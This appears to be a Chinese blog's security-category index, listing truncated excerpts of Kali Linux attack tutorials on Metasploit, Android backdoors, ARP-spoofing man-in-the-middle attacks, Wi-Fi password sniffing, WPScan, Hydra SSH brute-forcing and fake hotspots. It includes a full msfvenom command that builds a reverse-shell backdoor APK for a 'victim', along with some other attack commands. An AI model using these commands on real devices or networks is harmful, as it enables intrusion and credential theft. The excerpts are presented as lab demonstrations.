分类 安全 articles

Metasploit的基本使用

Metasploit可以在Linux、Windows和Mac OS X系统上运行。我假设你已安装了Metasploit,或者你使用的系统是Kali Linux。它有命令行接口也有GUI接口。 我使用的系统是Kali Linux,本文以这个系统为例。 图形用户界面接口:Armitage 命令行接口……

Continue reading

演示使用Metasploit入侵Windows

我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 explo……

Continue reading

演示使用Metasploit入侵Android

文本演示怎么使用Kali Linux入侵Android手机。 Kali Linux IP地址:192.168.0.112;接收连接的端口:443。 同一局域网内android手机一部(android 5.1) 创建一个后门程序 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk 这个后门程序(APK)是发送给受害者的;要把上面命令的IP……

Continue reading

Kali Linux ettercap的使用

ettercap是执行ARP欺骗嗅探的工具,通常用它来施行中间人攻击。 我还介绍过另一个arp欺骗工具-arpspoof 我使用的是Kali Linux 2.0;在开始使用ettercap之前,先配置一下: 编辑配置文件/etc/ettercap/etter.conf: # vim /etc/ettercap/etter.conf 找到privs一段,改……

Continue reading

使用Kali Linux执行中间人攻击(演示)

中间人攻击也叫Man-In-The-Middle-Attack。 我假设你已经知道中间人攻击的基本概念,引用一段wikipedia: 中间人攻击(Man-in-the-middle attack,缩写:MITM)是指攻击者与通讯的两端分别建立独立的联系,并交换其所收到的数据,使通讯的两……

Continue reading

集线器、交换机和路由器的区别

集线器、交换机和路由器都是计算机网络设备,而且非常容易混淆。那么集线器、交换机和路由器有什么区别呢? 用简单的话说,就是智商高低。路由器最智能、集线器最傻。 集线器、交换机和路由器都允许你把一个或多个计算机连接到其他计算机、网络设备等。每个都有多个网络接口,允许你插入网线接入网络,但……

Continue reading

在Wifi网络中嗅探明文密码(HTTP POST请求、POP等)

全世界,现在大约50%的网站没有使用SSL加密,天朝尤其多。 我们都知道通过HTTP发送的数据都是明文,没有使用任何加密,即使是在数据敏感的登录页面。 本文的目的是:如果你在不熟悉的网络环境中,要注意提高警惕。 没有人希望自己的密码暴露给他人,so,不要嗅探(狗)他人的密码。 想象有一个……

Continue reading

使用WPScan破解wordpress站点密码

我这里使用的Kali Linux,它默认安装了WPScan。 在使用WPScan之前,先更新它的漏洞数据库: # wpscan –update 扫描wordpress用户 wpscan -–url [wordpress网址] –-enumerate u 以我的网站为例: # wpscan --url http://blog.topspeedsnail.com --enumerate u 注意:要用使用两个–,否则报错-“The WordPress……

Continue reading

使用Hydra通过ssh破解密码

Hydra是非常高效的网络登录破解工具,它可以对多种服务程序执行暴力破解(SSH、VNC等等)。 防止这种攻击其实很容易,方法很多。以SSH为例: Ubuntu:使用Port Knocking隐藏SSH端口 在Ubuntu中用Fail2Ban保护SSH CentOS 7安装使用Fail2Ban保护SS……

Continue reading

创建假的wifi热点

本帖介绍怎么创建假的wifi热点,然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包,使这些路由器瘫痪,强迫用户连接(或自动连接)我们创建的假wifi热点。 这种攻击也叫”水坑攻击”-把其他用户都聚集到一个”坑”中。 系统要求: Kali Linux 本地有线网络连接(网……

Continue reading